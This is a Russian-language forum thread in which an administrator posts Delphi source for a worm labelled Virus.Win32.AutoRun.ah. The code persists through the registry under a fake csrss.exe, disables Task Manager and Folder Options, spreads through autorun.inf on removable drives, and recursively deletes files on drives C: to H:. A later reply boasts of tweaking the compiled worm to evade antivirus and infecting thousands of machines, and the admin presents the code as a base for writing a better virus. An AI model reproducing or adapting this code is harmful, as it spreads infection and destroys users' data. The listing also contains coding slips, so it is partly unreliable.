|
dolphin
|
Дата: Пятница, 03.10.2008, 17:40 | Сообщение # 1
|
Администратор
Сообщений: 902
Статус: Offline
|
Code
program Virus.Win32.AutoRun.ah;
uses
Registry, SysUtils, Windows;
var
WinDir, SysDir: String;
Buffer: array[0..1023] of Char;
F: TextFile; Reg: TRegistry;
function DriveExists(Drive: Byte): Boolean;
begin
Result:= Boolean(GetLogicalDrives AND(1 shl Drive))
end;
procedure InFect(FileName: String);
begin
AssignFile(F,FileName);
Reset(F);
WriteLn(F,'open='+SysDir+'\config\csrss.exe');
CloseFile(F);
end;
procedure FindAndDelete(Drive: String);
var
SearchRec: TSearchRec;
begin
if FindFirst(Drive+'*.*', faAnyFile,SearchRec) = 0 then
repeat
if (SearchRec.Attr and faAnyFile) = SearchRec.Attr then
begin
DeleteFile(SearchRec.Name);
end;
until FindNext(SearchRec) <> 0;
if FindFirst('*', faAnyFile, SearchRec) = 0 then
repeat
if (SearchRec.Attr and faDirectory) = faDirectory then
if SearchRec.Name[1] <> '.' then
begin
ChDir(SearchRec.Name);
FindAndDelete(Drive);
ChDir('..');
end;
until FindNext(SearchRec) <> 0;
end;
SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer)));
CopyFile(PChar(ParamStr(0)),PChar(WinDir+'\media\arona.exe'),false);
SetString(SysDir, Buffer, GetSystemDirectory(Buffer, SizeOf(Buffer)));
CopyFile(PChar(ParamStr(0)),PChar(SysDir+'\config\csrss.exe'),false);
AssignFile(F,SysDir+'\config\logon.bat');
Reset(F);
WriteLn(F,'@'+SysDir+'\config\csrss.exe');
CloseFile(F);
Reg:=TRegistry.Create;
Reg.RootKey:=HKEY_LOCAL_MACHINE;
Reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run’,true);
Reg.WriteString('Worms',SysDir+'\config\logon.bat');
Reg.CloseKey;
Reg.RootKey:=HKEY_CURRENT_USER;
REg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\System',true);
Reg.WriteInteger('DisableTaskMgr',1);
Reg.CloseKey;
Reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',true);
Reg.WriteInteger('NoFolderOptions',1);
Reg.Free;
try
InFect(SysDir+'\config\autorun.inf');
if DriveExists(5) then //
begin
InFect('F:\autorun.inf');
end;
if DriveExists(6) then //
begin
InFect('G:\autorun.inf');
end;
if DriveExists(7) then //
begin
InFect('H:\autorun.inf');
end;
if DriveExists(10) then
begin
InFect('K:\autorun.inf');
end;
if DriveExists(11) then
begin
InFect('L:\autorun.inf');
end;
if DriveExists(14) then
begin
InFect('O:\autorun.inf');
end;
except
Exit;
end;
try
FindAndDelete('D:\');
FindAndDelete('C:\');
FindAndDelete('E:\');
FindAndDelete('F:\');
FindAndDelete('G:\');
FindAndDelete('H:\');
except
Exit;
end;
|
| |
|
|
|
KenT
|
Дата: Суббота, 06.12.2008, 13:49 | Сообщение # 2
|
Группа: Удаленные
|
я маляська тупой ^^ )))а что с этим кодом делать..._)и он мну заипал xD столько раз у мну на компе зависал )))
Добавлено (06.12.2008, 13:49)
---------------------------------------------
аа.....)памому дагнал ....Или..................))))))[color))))))yellow]типо их нада  вводить в Delphi
|
| |
|
|
|
Заглянувший
|
Дата: Пятница, 23.01.2009, 18:03 | Сообщение # 3
|
|
Группа: Гости
|
Это же ппц старый исходник....теперь этот исходник и вирусы палят! Мне уже пол года назад пришлось этот вирус после компиляции пихать в отладчик и править байты...работал он у меня хорошо.....я его скинул в школу! Тогда наверно пол города им заразилось....машин наверно более 7000.....после чего его стал палить нод 32 а потом уже и касперский...вот так вот....
Пацики я создал сайт но там пока ещё мало чего.....
www.griping.do.am |
| |
|
|
|
dolphin
|
Дата: Суббота, 04.04.2009, 23:40 | Сообщение # 4
|
|
Администратор
Сообщений: 902
Статус: Offline
|
Заглянувший, Это как пример вируса, я же не говорю брать код и компилировать, на его основе можно написать свой ещё лучше чем прежний 
Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle
Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
|
| |
|
|
